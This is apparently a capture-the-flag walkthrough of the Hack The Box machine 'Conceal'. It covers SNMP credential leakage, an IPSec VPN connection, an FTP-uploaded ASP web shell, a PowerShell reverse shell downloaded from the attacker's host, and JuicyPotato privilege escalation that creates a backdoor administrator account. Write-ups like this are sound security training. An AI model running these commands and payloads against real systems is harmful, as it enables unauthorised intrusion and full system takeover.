Conceal
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.116 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Tue Sep 20 22:42:36 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up.
All 65535 scanned ports on 10.10.10.116 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
# Nmap done at Tue Sep 20 22:43:04 2022 -- 1 IP address (1 host up) scanned in 27.46 secondsThere are no ports open, or at least that is what it looks like. But, if we scan the UDP ports, we'll see that ports 161, and 500 are open.
nmap -sU -p- --min-rate 10000 -n -Pn -oN allPortsUDP 10.10.10.116
-sUscan UDP ports.--min-rate 10000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-21 01:46 CEST
Nmap scan report for 10.10.10.116
Host is up (0.057s latency).
Not shown: 65533 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
500/udp open isakmp
Nmap done: 1 IP address (1 host up) scanned in 13.45 secondsAs we can see in the Wikipedia list of TCP and UDP ports, port 161 is for Simple Network Management Protocol (SNMP), and port 500 is used by most IPSEC-based VPN systems for the establishment of securely encrypted "tunnels" between endpoint machines.
Exploitation
Sometimes, we can get useful information from the SNMP service. In this case, we can get a password hash using snmpwalk.
snmpwalk -v 2c -c public 10.10.10.116
-vspecifies SNMP version to use.-cset the community string.
...
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
...We can see with crackstation, that the password is Dudecake1!.
Now that we have a password, we could try to connect to the IPSEC VPN on port 500. But first, we need more information about the Internet Key Exchange (IKE).
ike-scan 10.10.10.116 -M
-Msplit the payload decode across multiple lines.
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116 Main Mode Handshake returned
HDR=(CKY-R=70d7ac70dfe4ef11)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)
Ending ike-scan 1.9.5: 1 hosts scanned in 0.055 seconds (18.16 hosts/sec). 1 returned handshake; 0 returned notifyFinally, before configuring connecting the VPN, we need to install some tools, and adjust the HTB network interface.
apt-get install strongswan libstrongswan-extra-plugins
ifconfig tun0 mtu 1000
Now we are ready to start modifying the configuration files necessary to connect to the VPN. First, we'll have to add the password we found to the /etc/ipsec.secrets.
nano /etc/ipsec.secrets
# This file holds shared secrets or RSA private keys for authentication.
# RSA private key for this host, authenticating it to any other host
# which knows the public part.
%any : PSK "Dudecake1!"Then, we have to configure a new connection in the /etc/ipsec.conf with the following options.
nano /etc/ipsec.conf
conn conceal
authby=secret
auto=add
ike=3des-sha1-modp1024
esp=3des-sha1
fragmentation=yes
type=transport
keyexchange=ikev1
left=10.10.14.8
leftprotoport=tcp
right=10.10.10.116
rightprotoport=tcp
rightsubnet=10.10.10.116[tcp]Then, restart the ipsec service, and connect to the VPN we just set up.
ipsec restart
ipsec up conceal
initiating Main Mode IKE_SA conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.14.8[500] to 10.10.10.116[500] (236 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.8[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
selected proposal: IKE:3DES_CBC/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.14.8[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.8[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH N(INITIAL_CONTACT) ]
sending packet: from 10.10.14.8[500] to 10.10.10.116[500] (100 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.8[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA conceal[1] established between 10.10.14.8[10.10.14.8]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 10152s
maximum IKE_SA lifetime 10692s
generating QUICK_MODE request 526873345 [ HASH SA No ID ID ]
sending packet: from 10.10.14.8[500] to 10.10.10.116[500] (220 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.8[500] (188 bytes)
parsed QUICK_MODE response 526873345 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
CHILD_SA conceal{1} established with SPIs cf315afa_i 52e3e458_o and TS 10.10.14.8/32[tcp] === 10.10.10.116/32[tcp]
connection 'conceal' established successfullyIf now we scan the ports of the machine, we'll see some open. Make sure to make a TCP scan.
nmap -sT --min-rate 5000 -p- -T5 -Pn -n 10.10.10.116 -oN allPorts
-sTTCP connect scan is the default TCP scan type when SYN scan is not an option..--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Wed Sep 21 00:00:06 2022 as: nmap -sT --min-rate 5000 -n -Pn -p- -oN allPortsVPN 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.055s latency).
Not shown: 65523 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
# Nmap done at Wed Sep 21 00:00:25 2022 -- 1 IP address (1 host up) scanned in 18.88 secondsThere is an FTP server which allows anonymous login. But the file server is empty.
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:alfa8sa): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49718|)
125 Data connection already open; Transfer starting.
226 Transfer complete.The website just shows the default Windows Web Server IIS website.
If we search for subdirectories with gobuster, we'll find the /upload directory.
gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.116
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2022/09/21 02:12:12 Starting gobuster in directory enumeration mode
===============================================================
/upload (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]
===============================================================
2022/09/21 02:15:52 Finished
===============================================================The /upload directory is empty.
But, if we upload a test.txt file to the FTP server.
ftp> put test.txt
We'll see the file in the /upload directory, and we could access it.
Let's try to run commands on the system by uploading a .asp file. First, make the cmd.asp file with the following content.
nano cmd.asp
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>Now, upload it to the FTP server.
ftp> put cmd.asp
And run commands with the cmd GET parameter.
Time to get a shell. First, download the Invoke-PowerShellTcp.ps1 file from Nishang, and add the following function at the end of the script. I will rename the file.
mv Invoke-PowerShellTcp.ps1 rv.ps1
nano rv.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4444Now, set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
And set a simple HTTP server with python on the current directory.
python -m http.server 80
Now, if we access the following URL, the machine will download the rv.ps1 file, and will send us a reverse shell as the conceal\destitute user. Then we'll be able to grab the user flag.
http://10.10.10.116/upload/cmd.asp?cmd=powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8/rv.ps1')
listening on [any] 4444 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.116] 49724
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute
PS C:\Windows\SysWOW64\inetsrv> type \users\destitute\desktop\proof.txt
6E9FDFE0DCB66E700FB9CB824AE5A6FFPrivilege Escalation
Let's see what privileges the user conceal\destitute has.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledIf a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.
To escalate privileges, we'll have to transfer JuicyPotato.exe to the victim machine. Let's set a python HTTP server on the directory where we have the JuicyPotato binary.
python -m SimpleHTTPServer
And download the binaries from the desktop folder of the nt authority\iusr user.
certutil.exe -f -urlcache -split http://10.10.14.11:8000/JuicyPotato.exe JuicyPotato.exe
The idea is to create a new user called alfa8sa, then add that user to the administrators group, modify some necessary registry, and then we'll be able to get a shell as the NT AUTHORITY\SYSTEM user with the psexec.py tool. Let's run the JuicyPotato binary to create the new user.
.\JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net user alfa8sa alfa8sa123$! /add"
-tcreateprocess call.-lCOM server listen port.-pprogram to launch.-aspecify command arguments.
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
COM -> recv failed with error: 10038But we get an error. This is happening because JuicyPotato is using the default CLSID. If check for system information, we'll see the machine is a Microsoft Windows 10 Enterprise.
systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-00000-00003-AA343
Original Install Date: 12/10/2018, 20:04:27
System Boot Time: 21/09/2022, 00:05:36
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,100 MB
Virtual Memory: Max Size: 3,199 MB
Virtual Memory: Available: 2,272 MB
Virtual Memory: In Use: 927 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.116
[02]: fe80::b902:b205:2eba:669a
[03]: dead:beef::69ca:1ad1:5bb4:f67d
[04]: dead:beef::b902:b205:2eba:669a
[05]: dead:beef::203
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.So we have to change the CLSID to a valid one. You can check a Windows 10 Enterprise CLSID list here.
If we change it for {5B3E6773-3A99-4A3D-8096-7765DD11785C}, the user will be created.
.\JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net user alfa8sa alfa8sa123$! /add" -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"
-tcreateprocess call.-lCOM server listen port.-pprogram to launch.-aspecify command arguments.-cuse CLSID.
Testing {5B3E6773-3A99-4A3D-8096-7765DD11785C} 1337
......
[+] authresult 0
{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OKNow, add the alfa8sa user to the administrators group.
.\JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net localgroup Administrators alfa8sa /add" -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"
We can check that the alfa8sa user is a member of the administrators group.
net user alfa8sa
User name alfa8sa
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 21/09/2022 00:31:48
Password expires 02/11/2022 00:31:48
Password changeable 21/09/2022 00:31:48
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.To be able to get a shell with psexec.py, we'll need to modify certain registry.
.\JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f" -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"
Finally, if we get a shell as nt authority\system with psexec.py, then all we have to do is reap the harvest and take the root flag.
psexec.py WORKGROUP/alfa8sa:'alfa8sa123$!'@10.10.10.116
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.116.....
[*] Found writable share ADMIN$
[*] Uploading file GsbtFazN.exe
[*] Opening SVCManager on 10.10.10.116.....
[*] Creating service sOJN on 10.10.10.116.....
[*] Starting service sOJN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type \users\administrator\desktop\proof.txt
5737DD2EDC29B5B219BC43E60866BE08Last updated
Was this helpful?